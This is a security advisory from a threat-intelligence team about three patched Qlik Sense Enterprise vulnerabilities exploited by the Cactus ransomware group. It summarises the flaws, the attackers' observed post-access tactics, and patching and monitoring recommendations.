Advisory December 1, 2023

Critical Security Vulnerabilities in Qlik Sense Exploited by Cactus Ransomware

The Obrela Threat Intelligence Team

Overview:

Recent reports indicate that the Cactus ransomware threat actor has actively exploited three critical vulnerabilities in Qlik Sense Enterprise for Windows. The vulnerabilities—CVE-2023-41266, CVE-2023-41265, and CVE-2023-48365—were discovered by Praetorian, disclosed in August and September, and subsequently patched by Qlik.

Exploited Vulnerabilities:

  1. CVE-2023-41266 (CVSS score: 9.9): A path traversal issue enabling remote, unauthenticated attackers to generate anonymous sessions and send HTTP requests to unauthorized endpoints.
  2. CVE-2023-41265 (CVSS score: 6.5): An HTTP tunneling flaw exploitable to elevate privileges and execute HTTP requests on backend servers, allowing remote, unauthenticated hackers to execute arbitrary code and add new admin users.
  3. CVE-2023-48365 (CVSS score: 9.9: An unauthenticated remote code execution vulnerability resulting from an incomplete patch for CVE-2023-41265.

Exploitation Tactics:

After gaining initial access to targeted systems, the threat actors were observed undertaking various malicious activities, including downloading tools via PowerShell and BITS, uninstalling security software, changing admin account passwords, installing remote access software (i.e., AnyDesk), utilizing RDP and Plink for lateral movement, and exfiltrating data to cloud storage services via rclone. In some instances, the attackers attempted to deploy the Cactus ransomware.

Cactus Ransomware Campaign:

The Cactus ransomware has been active since March 2023, targeting major organizations. The threat actor exploits vulnerabilities, initially in VPN appliances and now in Qlik Sense, for initial access.

Recommendations:

  • Patch Management: Ensure all Qlik Sense Enterprise for Windows installations are updated with the latest patches released by Qlik in August and September 2023.
  • Security Measures: Consider reinforcing security measures, including reviewing and enhancing network segmentation, monitoring for unusual activities, and conducting thorough security audits.

References: